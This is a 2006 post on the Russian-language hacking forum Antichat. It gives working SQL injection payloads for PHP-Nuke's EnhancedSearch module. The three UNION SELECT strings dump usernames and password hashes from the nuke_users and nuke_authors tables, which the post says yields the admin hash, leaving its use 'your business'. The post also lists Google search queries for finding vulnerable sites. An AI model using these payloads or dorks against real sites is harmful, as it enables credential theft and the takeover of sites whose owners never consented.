Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
phpnuke SQL Inj ALL VERSIONS |
12.05.2006, 00:59
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867
Репутация:
408
|
|
phpnuke SQL Inj ALL VERSIONS
Бага найдена в модуле поиска (EnhancedSearch).
Ввести в поиске :
EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*
EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
И получим хеш админа.
А что с ним делать, это уже ваше дело  )))
Небольшие запросы для гугла )
"Enhanced Search Version 2.0: Powered by"
inurl:"modules.php?name=EnhancedSearch"
Источник : security.nnov.ru |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид